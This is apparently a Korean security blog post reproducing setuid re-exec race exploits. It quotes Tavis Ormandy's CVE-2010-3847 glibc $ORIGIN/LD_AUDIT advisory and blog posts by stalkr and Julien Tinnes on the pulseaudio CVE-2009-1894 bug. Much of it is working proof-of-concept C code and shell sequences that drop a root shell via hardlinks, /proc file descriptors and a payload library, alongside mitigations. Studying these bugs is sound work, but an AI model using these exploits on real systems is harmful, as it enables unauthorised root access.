The GNU C library dynamic linker expands $ORIGIN in setuid library search path

The GNU C library dynamic linker expands $ORIGIN in setuid library search path

이 글은 위 취약점을 확인해보는 과정에서 알게된 내용으로 구성되어 있습니다. (연관성이 많이 없을수도...)

현재 접속한 계정 확인

$ whoami; id

먼저 hello.c 파일을 아래와 같이 작성하여 컴파일

hello.c:

#include <stdio.h>
#include <unistd.h>
int main()
{
    char buf[4096];
    readlink("/proc/self/exe", buf, sizeof(buf));
 
    printf("----------[hello]----------\n");
    printf("getuid(): %d\n", getuid());
    printf("geteuid(): %d\n", geteuid());
    printf("buf: %s\n", buf);
    printf("---------------------------\n");
 
    return 0;
}

동일하게 bye.c 파일을 작성하여 컴파일

bye.c:

#include <stdio.h>
#include <unistd.h>
int main()
{
    char buf[4096];
    readlink("/proc/self/exe", buf, sizeof(buf));
 
    printf("-----------[bye]-----------\n");
    printf("getuid(): %d\n", getuid());
    printf("geteuid(): %d\n", geteuid());
    printf("buf: %s\n", buf);
    printf("---------------------------\n");
 
    return 0;
}

$ ln -f hello say

hello 파일을 say 파일로 하드 링크

파일 디스크립터 3번으로 하드 링크로 만든 say 파일을 연결

연결을 하고나서 say 파일을 삭제

say 파일을 삭제하고 다시 보면 say (deleted) 표시가 되어 있지만, /proc/$$/fd/3 을 실행해보면 정상적으로 처음에 연결한 hello가 실행됨

삭제한 say 파일 대신 bye파일을 'say (deleted)' 파일로 하드 링크한 다음, 다시 확인해보면 표시가 변경된 것을 확인 가능

다시 /proc/$$/fd/3 을 실행해보면 처음과 동일하게 hello가 실행되지만 'say (deleted)' 파일은 bye 파일을 하드 링크하였기 때문에 bye가 실행됨

여기에서 앞에 실행한 결과들을 보면 readlink로 읽은 경로가 /home/guest/pwn/say (deleted)로 되어있는 것을 볼 수 있다.

따라서, 아래와 같은 상황이라면 쉘을 획득할 수 있는 시나리오를 만들 수 있다.

1. root(쉘을 획득할 수 있는 계정)로 setuid가 걸린 파일이 존재

2. /proc/self/exe를 통해서 현재 실행 중인 링크를 가지고 다시 실행 (자기 자신을 반복해서 실행하는 형태)

이 두 조건이 맞을 경우 현재 사용하고 있는 리눅스에서도 쉘 획득이 가능하였음

(Ubuntu 14.04, CentOS 6,5 에서 동작 확인, 20160128)

root 계정으로 취약한 코드 작성하여 컴파일

vulnerable.c:

#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[], char *envp[])
{
 
    if(argc < 2)
    {
        char buf[4096];
        if(readlink("/proc/self/exe", buf, sizeof(buf)) < 0) return 1;
 
        printf("----------[hello]----------\n");
        printf("getuid(): %d\n", getuid());
        printf("geteuid(): %d\n", geteuid());
        printf("buf: %s\n", buf);
        printf("---------------------------\n");
 
        char *args[] = { buf, "1", 0 };
        if(execve(args[0], args, 0) < 0) return 1;
    }
 
    return 0;
}

생성한 파일에 setuid 설정

# chmod u+s vulnerable

guest 계정으로 공격 코드 작성하여 컴파일

poc.c:

#include <stdio.h>
#include <unistd.h>
int main()
{
    char buf[4096];
    if(readlink("/proc/self/exe", buf, sizeof(buf)) < 0) return 1;
    
    printf("-----------[bye]-----------\n");
    printf("getuid(): %d\n", getuid());
    printf("geteuid(): %d\n", geteuid());
    printf("buf: %s\n", buf);
    printf("---------------------------\n");
 
    if(geteuid() != 0) return 1;
    
    setuid(geteuid());
    char *args[] = { "/bin/sh", 0 };
    execve(args[0], args, 0);
 
    return 0;
}

생성한 파일들을 실행하여 정상적으로 동작하는 지 확인

vulnerable은 geteuid() 값이 0, poc는 geteuid() 값이 1000

앞부분에서 한 것과 동일하게 취약한 vulnerable 파일을 target으로 하드 링크로 생성한 다음, 파일 디스크립터 3번으로 연결해준다.

그리고 target 파일을 삭제

공격 코드가 있는 poc 파일을 'target (deleted)'로 하드 링크로 생성한 다음, 해당되는 파일 디스크립터을 실행해주면 루트 쉘을 떨어뜨릴 수 있다.

조금 더 풀어서 이야기하자면, /proc/$$/fd/3 을 실행하면 먼저 [hello]에 해당되는 코드가 실행이 되면서 [hello] 코드 내에 있는 /proc/self/exe는 위 사진을 보면 알 수 있듯이 /home/guest/pwn/target (deleted) 값을 가진다. 따라서 /proc/$$/fd/3를 실행했지만 자기 자신을 다시 실행하는 과정에서 /proc/$$/fd/3가 아니라 /home/guest/pwn/target (deleted)가 실행이 된다. 이 때 해당 파일은 기존의 [hello] 코드가 아니라 [bye] 코드로 대체되어 있기 때문에 root 권한으로 [bye] 코드가 실행이 되면서 루트 쉘이 떨어진다.

즉, 루트가 실행하는 프로그램을 내가 원하는 프로그램으로 바꿔치기!

---

The GNU C library dynamic linker expands $ORIGIN in setuid library search path 시도해봤는데..실패

참고: http://seclists.org/fulldisclosure/2010/Oct/257

The GNU C library dynamic linker expands $ORIGIN in setuid library search path

---

From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Mon, 18 Oct 2010 12:17:25 +0200

---

The GNU C library dynamic linker expands $ORIGIN in setuid library search path
------------------------------------------------------------------------------

Gruezi, This is CVE-2010-3847.

The dynamic linker (or dynamic loader) is responsible for the runtime linking of
dynamically linked programs. ld.so operates in two security modes, a permissive
mode that allows a high degree of control over the load operation, and a secure
mode (libc_enable_secure) intended to prevent users from interfering with the
loading of privileged executables.

$ORIGIN is an ELF substitution sequence representing the location of the
executable being loaded in the filesystem hierarchy. The intention is to allow
executables to specify a search path for libraries that is relative to their
location, to simplify packaging without spamming the standard search paths with
single-use libraries.

Note that despite the confusing naming convention, $ORIGIN is specified in a
DT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the
environment (developers would normally use the -rpath ld parameter, or
-Wl,-rpath,$ORIGIN via the compiler driver).

The ELF specification suggests that $ORIGIN be ignored for SUID and SGID
binaries,

http://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution

"For security, the dynamic linker does not allow use of $ORIGIN substitution
 sequences for set-user and set-group ID programs. For such sequences that
 appear within strings specified by DT_RUNPATH dynamic array entries, the
 specific search path containing the $ORIGIN sequence is ignored (though other
 search paths in the same string are processed). $ORIGIN sequences within a
 DT_NEEDED entry or path passed as a parameter to dlopen() are treated as
 errors. The same restrictions may be applied to processes that have more than
 minimal privileges on systems with installed extended security mechanisms."

However, glibc ignores this recommendation. The attack the ELF designers were
likely concerned about is users creating hardlinks to suid executables in
directories they control and then executing them, thus controlling the
expansion of $ORIGIN.

It is tough to form a thorough complaint about this glibc behaviour however,
as any developer who believes they're smart enough to safely create suid
programs should be smart enough to understand the implications of $ORIGIN
and hard links on load behaviour. The glibc maintainers are some of the
smartest guys in free software, and well known for having a "no hand-holding"
stance on various issues, so I suspect they wanted a better argument than this
for modifying the behaviour (I pointed it out a few years ago, but there was
little interest).

However, I have now discovered a way to exploit this. The origin expansion
mechanism is recycled for use in LD_AUDIT support, although an attempt is made
to prevent it from working, it is insufficient.

LD_AUDIT is intended for use with the linker auditing api (see the rtld-audit
manual), and has the usual restrictions for setuid programs as LD_PRELOAD does.
However, $ORIGIN expansion is only prevented if it is not used in isolation.

The codepath that triggers this expansion is

    _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()

(in the code below DST is dynamic string token)

http://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741

 741       /* Expand DSTs.  */
 742       size_t cnt = DL_DST_COUNT (llp, 1);
 743       if (__builtin_expect (cnt == 0, 1))
 744         llp_tmp = strdupa (llp);
 745       else
 746         {
 747           /* Determine the length of the substituted string.  */
 748           size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
 749
 750           /* Allocate the necessary memory.  */
 751           llp_tmp = (char *) alloca (total + 1);
 752           llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
 753         }

http://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245

 253       if (__builtin_expect (*name == '$', 0))
 254         {
 255           const char *repl = NULL;
 256           size_t len;
 257
 258           ++name;
 259           if ((len = is_dst (start, name, "ORIGIN", is_path,
 260                              INTUSE(__libc_enable_secure))) != 0)
 261             {
    ...
 267                 repl = l->l_origin;
 268             }

http://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171


 202   if (__builtin_expect (secure, 0)
 203       && ((name[len] != '\0' && (!is_path || name[len] != ':'))
 204           || (name != start + 1 && (!is_path || name[-2] != ':'))))
 205     return 0;
 206
 207   return len;
 208 }

As you can see, $ORIGIN is only expanded if it is alone and first in the path.
This makes little sense, and does not appear to be useful even if there were
no security impact. This was most likely the result of an attempt to re-use the
existing DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally
introducing this error.

Perhaps surprisingly, this error is exploitable.

--------------------
Affected Software
------------------------

At least the following versions have been tested

    2.12.1, FC13
    2.5, RHEL5 / CentOS5

Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.

--------------------
Consequences
-----------------------

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

-------------------
Mitigation
-----------------------

It is a good idea to prevent users from creating files on filesystems mounted
without nosuid. The following interesting solution for administrators who
cannot modify their partitioning scheme was suggested to me by Rob Holland
(@robholland):

You can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,
for example:

# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp

Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.

(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).

If someone wants to create an init script that would automate this at boot for
their distribution, I'm sure it would be appreciated by other administrators.

-------------------
Solution
-----------------------

Major distributions should be releasing updated glibc packages shortly.

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy.

-------------------
Greetz
-----------------------

Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,
Asirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,
and all my other elite friends and colleagues.

Additional greetz to the openwall guys who saw this problem coming years ago.
They continue to avoid hundreds of security vulnerabilities each year thanks to
their insight into systems security.

http://www.openwall.com/owl/

-------------------
Notes
-----------------------

There are several known techniques to exploit dynamic loader bugs for suid
binaries, the fexecve() technique listed in the Consequences section above is a
modern technique, making use of relatively recent Linux kernel features (it was
first suggested to me by Adam Langley while discussing CVE-2009-1894, but I
believe Gabriel Campana came up with the same solution independently).

The classic UNIX technique is a little less elegant, but has the advantage that
read access is not required for the target binary. It is rather common for
administrators to remove read access from suid binaries in order to make
attackers work a little harder, so I will document it here for reference.

The basic idea is to create a pipe(), fill it up with junk (pipes have 2^16
bytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the
Linux Programmers Manual), then dup2() it to stderr. Following the dup2(),
anything written to stderr will block, so you simply execve() and then make the
loader print some error message, allowing you to reliably win any race
condition.

LD_DEBUG has always been a a good candidate for getting error messages on
Linux. The behaviour of LD_DEBUG was modified a few years ago in response to
some minor complaints about information leaks, but it can still be used with a
slight modification (I first learned of this technique from a bugtraq posting
by Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).

The exploit flow for this alternative attack is a little more complicated, but
we can still use the shell to do it (this session is from an FC13 system,
output cleaned up for clarity).

# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.
$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &
[1] 26926

# Now ld.so is blocked on write() in the background trying to say "invalid
# debug option", so we are free to manipulate the filesystem.
$ rm -rf /tmp/exploit/

# Put exploit payload in place.
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

# Clear the pipe by killing sleep, letting cat drain the contents. This will
# unblock the target, allowing it to continue.
$ pkill -n -t $(tty | sed 's#/dev/##') sleep
-bash: line 99: 26929 Terminated          sleep 1h

# And now we can take control of a root shell :-)
$ fg
sh-4.1# id
uid=0(root) gid=500(taviso)

Another technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then
while the loader is trying to map lots of memory, you have a good chance of
winning any race. I previously found an integer overflow in this feature and
suggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc
maintainers disagreed and just fixed the overflow.

http://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html

I believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the
next big loader bug is going to be, it's just not safe to let attackers have
that much control over the execution environment of privileged programs.

Finally, some notes on ELF security for newcomers. The following common
conditions are usually exploitable:

    - An empty DT_RPATH, i.e. -Wl,-rpath,""
      This is a surprisingly common build error, due to variable expansion
      failing during the build process.
    - A relative, rather than absolute DT_RPATH.
      For example, -Wl,-rpath,"lib/foo".

I'll leave it as an exercise for the interested reader to explain why. Remember
to also follow DT_NEEDED dependencies, as dependencies can also declare rpaths
for their dependencies, and so on.

-------------------
References
-----------------------

- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.
- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.
- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.
- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.
- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574
- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html

You should subscribe to Linux Weekly News and help support their high standard
of security journalism.

http://lwn.net/

I have a twitter account where I occasionally comment on security topics.

http://twitter.com/taviso

ex$$

-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html 

Hosted and sponsored by Secunia - http://secunia.com/

참고: http://blog.stalkr.net/2010/11/exec-race-condition-exploitations.html

SATURDAY, NOVEMBER 06, 2010

Exec race condition exploitations

I recently learned a cool technique for exploiting exec race conditions. It was mentioned in a comment byJulien Tinnes about the 2009 pulseaudio vulnerability in Linux, and more recently by Tavis Ormandy (@taviso) about the GNU C library dynamic linker expanding $ORIGIN in setuid library search path vulnerability. I am sure that many people know this for ages, but still it was new to me and I thought it was worth a small post on it.

In short

Consider the pulseaudio case, which can be reduced to:

• file is setuid
• readlink("/proc/self/exe", buf, sizeof(buf))
• later, execve(buf, .., ..)

We have a race condition between the moment the program is run (under the owner's uid), and the moment the symlink to the program is read via readlink() syscall and program executed again via execve() syscall.

This race condition can be exploited if you are able to change the value pointed by the symlink /proc/self/exeright after the program execution and before readlink(). You can do that by creating a hardlink to the program in a directory you own, then delete it and place your program within the race window. Indeed, if you use a symlink, execve() will resolve it before execution and /proc/self/exe would point to the actual program (that you cannot/do not want to delete).

Proof of concept

Consider the following vulnerable program:

1 2 3 4 5 6 7 8 9 10 11 12 13 14

#include <unistd.h> int main(int argc, char **argv, char **envp) {   char buf[4096];   /* do some stuff, and a check if we require new execution */   if (argc < 2)   {     if (readlink("/proc/self/exe", buf, sizeof(buf)) < 0) return 1;     char *args[] = { buf, "1", 0 };     if (execve(args[0], args, 0) < 0) return 1;   }   /* do some stuff */   return 0; }

Make it owned by root and give it the setuid bit:

1 2 3 4 5 6 7

$ gcc -Wall -o vulnerable vulnerable.c $ sudo chown root: vulnerable $ sudo chmod u+s vulnerable $ ls -l total 12 -rwsr-xr-x 1 root   root   6961 Nov  1 03:38 vulnerable -rw-r--r-- 1 stalkr stalkr  447 Nov  1 03:38 vulnerable.c

Exploit 1: classic race exploitation

For those where sh is linked to bash, we will need a small wrapper to give us euid (geteuid) as uid (setuid). Also, this wrapper will help in the classical exploitation of the race condition by exiting if it has not reached the target uid. Here is the wrapper:

1 2 3 4 5 6 7 8

#include <unistd.h> int main() {   if (geteuid()!=0) exit(1);   setuid(geteuid());   char *args[] = { "/bin/sh", 0 };   return execve(args[0], args, 0); }

Compile

1	$ gcc -Wall -o wrapper wrapper.c

Then open two shells. In the first shell, prepare to trigger the race condition by creating a hardlink to the vulnerable program, then place your program under the same filename (I use a hardlink too but it is not a requirement), and loop:

1	$ while :; do ln -f ./vulnerable poc; ln -f ./wrapper poc; done

In the second shell, just run the hardlink. We will use nice to lower the priority of the process and raise our chances for the race condition to be triggered:

1	$ while :; do nice -n 20 ./poc; done

Just wait and the shell should appear at some time, but it can take a long time.

To exploit this race reliably, we need to find a way to stop the execution of the process before its main(). That's the challenge Julien Tinnes gave to his readers, and I will repeat the two known solutions here.

Exploit 2: fill blocking pipes

I will just quote the answer comment by Julien Tinnes:

"So yeah, this is it, the LD_DEBUG trick still works. You set LD_DEBUG to a bogus value and then you exhaust a pipe like usual and dup2 it to the child's stderr. It solves the part where the parent has to wait for the child to be ready.
And to guarantee that the parent will not perform a certain action before the child is inside execve(), I used vfork().
So the LD_DEBUG trick + vfork() was our "old school" solution and Dividead was the first to find and report to us this solution (at least the first part)."

Indeed there is a very good work by Dividead on his blog, with exploit code.

Exploit 3: use /proc file descriptors

Create the hardlink, then open a file descriptor in the current shell to it:

1 2 3 4

$ ln vulnerable poc $ exec 3< ./poc $ ls -l /proc/$$/fd/3 lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc

It is important to realize that from this point the program has not been started, we just have a file descriptor to the program, and a file descriptor has all information about owner and setuid bit.

Now we delete our hardlink to the setuid program:

1	$ rm -f poc

Now if you check the file descriptor, it should have appended to its destination " (deleted)" and the link is broken:

1 2	$ ls -l /proc/$$/fd/3 lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc (deleted)

On some kernels it does not change the destination, you just see that the link is broken if you enable ls colors (green ok, red broken).

Then just place the program you want at this destination. Here I will just use a setuid(geteuid)+execve(/bin/sh) wrapper.

1	$ mv wrapper 'poc (deleted)'

On kernels where the fd symlink has not changed its destination, you just have to rename it to poc.

The final step is to execute the program. We do that by using shell built-in exec on the file descriptor and it has the effect of calling execve() on this file descriptor. But remember, this file descriptor has root owner and setuid bit, so it executes the vulnerable program (still on disk because it was a hardlink) with these properties. The vulnerable program then executes itself via /proc/self/exe which now points to our program, and we eventually get the euid root:

1 2 3

$ exec /proc/$$/fd/3 sh-4.1# id uid=0(root) gid=1000(stalkr) groups=0(root),1000(stalkr)

Race won in one shot!

Update: on newer kernels, this exploitation technique is no longer usable because file is renamed as (deleted) /path/to/file.

Conclusion

I very much liked the last technique using /proc and file descriptor. I hope I did not say anything wrong, if so feel free to correct me.

About the mitigations, in addition to protecting your /tmp with nosuid or noexec mount options, you can consider having your setuid binaries on another filesystem, thus disallowing hardlinking - because hardlinks can only be on the same filesystem by definition.

POSTED BY STALKR AT 13:37 

LABELS: EXPLOITATION, HARDLINK, LINUX, PROC, RACE, SETUID, TAVISO, TINNES

참고: http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html

THURSDAY, JULY 16, 2009

Old school local root vulnerability in pulseaudio (CVE-2009-1894)

Today was chosen as disclosure day for CVE-2009-1894.

Tavis Ormandy and myself have recently used the fact that pulseaudiowas set-uid root to bypass Linux' NULL pointer dereference prevention. This technique is relying on a limitation in the Linux kernel and not on a bug in pulseaudio. But we also found one unrelated bug in pulseaudio.

Since it's set-uid root, we thought we would give pulseaudio a quick look. In the very first lines of main(), you can find the following:

if (!getenv("LD_BIND_NOW")) {
char *rp;

putenv(pa_xstrdup("LD_BIND_NOW=1"));
pa_assert_se(rp = pa_readlink("/proc/self/exe"));
pa_assert_se(execv(rp, argv) == 0);
}
So, pulseaudio is re-executing itself through /proc/self/exe, so that the dynamic linker performs all relocation immediately at load-time.

There is an obvious race condition here. /proc/self/exe is a symbolic link to the actual pathname of the executed command: by creating a hard link to /usr/bin/pulseaudio, we control this pathname, and consequently the file under this pathname. Knowing this, the exploitation is trivial (Note that rename() is atomic, or alternatively note how __d_path() works with deleted entries).

It's also interesting to note that any operation performed on /proc/self/exe is guaranteed by the kernel to be performed on the same inode than the one that got executed (see proc_exe_link), something that two of my colleagues have recently pointed out to me. So if they had re-executed themselves by using /proc/self/exe directly, without going through readlink() first, they would not have been vulnerable. And actually they weren't before, if you read the Changelog, you'll find:

2007-10-29 15:33 lennart * : use real path of binary instead of /proc/self/exe to execute ourselves

Oops! (Thanks to my colleague Mike Mammarella for digging this)

Like the vulnerability in udevd, this is a very good example of a non memory corruption vulnerability which is trivial to exploit very reliably and in a cross-architecture way.

So, why does pulseaudio have the set-uid bit set, you may ask ? For real-time performances reasons it wants to keep CAP_SYS_NICE but will drop all other privileges.

This vulnerability could have been avoided if the principle of least privilege had been followed: Since privileges are not required to re-exec yourself, dropping privileges should have been the first thing pulseaudio did. Here it's only the second thing it does, and it was enough to make most Linux Desktops vulnerable.

If your distribution of choice did not patch this yet, or if you want to reduce your attack surface, you're advised to chmod u-s /usr/bin/pulseaudio. Also note that as with every setuid binary update, you should also check that your users didn't create "backup" vulnerable copies (hardlink), waiting to own your box with known vulnerabilities while you think you are safe from those.

PS: Here are two brain teasers for you:

1. Find a cool way to perform an action after execve() has succeeded in another process, but before main() executes. First, I've used a FD_CLOEXEC read descriptor in a pipe and a SIGPIPE handler, but while it gives good results in practice, there is not guarantee as to when the signal will get delivered. I've finally found (with a hint from Tavis) a 100% reliable way to do it that is always guaranteed to work at first try. Of course, such a level of sophistication is absolutely not needed for this exploit.

2. Since pulseaudio allows you to load arbitrary libraries, it allows you to run arbitrary code with CAP_SYS_NICE as a feature. In the light of NUMA coming to the desktop through QPI, can you do something more interesting than what you would first expect with this?

POSTED BY JULIEN TINNES AT 7:05 AM 

LABELS: LINUX, SECURITY, VULNERABILITY

5 COMMENTS:

1. 
   Arnaud CornetJuly 17, 2009 at 5:35 AM

   Hello,
   
   On dpkg based distros, hardlinking will not allow to keep the suid bit on the vulnerable program in case of an upgrade. dpkg removes suid bit before unlinking. See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=225692
   
   If you want to keep a specific permission on a particular file, you can use dpkg-statoverride that keeps the change accross upgrades.

   Reply
2. 
   AnonymousJuly 18, 2009 at 5:52 AM

   waiting to hear about your way to execute code before main()...

   Reply
3. 
   Julien TinnesJuly 18, 2009 at 8:38 AM

   I received only one correct solution for now. I'll wait a few more days before posting solutions.
   
   Cheers,

   Reply
4. 
   AnonymousJuly 21, 2009 at 9:38 AM

   No idea if this is the same thing, but for blocking between execution and main the method I thought up seems to work nice enough: http://dividead.wordpress.com/2009/07/21/blocking-between-execution-and-main/

   Reply
5. 
   Julien TinnesAugust 13, 2009 at 4:26 AM

   I forgot to reply here:
   So yeah, this is it, the LD_DEBUG trick still works. You set LD_DEBUG to a bogus value and then you exhaust a pipe like usual and dup2 it to the child's stderr. It solves the part where the parent has to wait for the child to be ready.
   And to guarantee that the parent will not perform a certain action before the child is inside execve(), I used vfork().
   So the LD_DEBUG trick + vfork() was our "old school" solution and Dividead was the first to find and report to us this solution (at least the first part).
   
   The new school solution, as found by a few individuals, the first mailing me being Gabriel Campana, is to use the magic of execve on fds in /proc (as described in the blog post): hardlink pulseaudio to "sploit", put your shell in "sploit (deleted)", open() "sploit", unlink it and fexecve() and you're done!

   Reply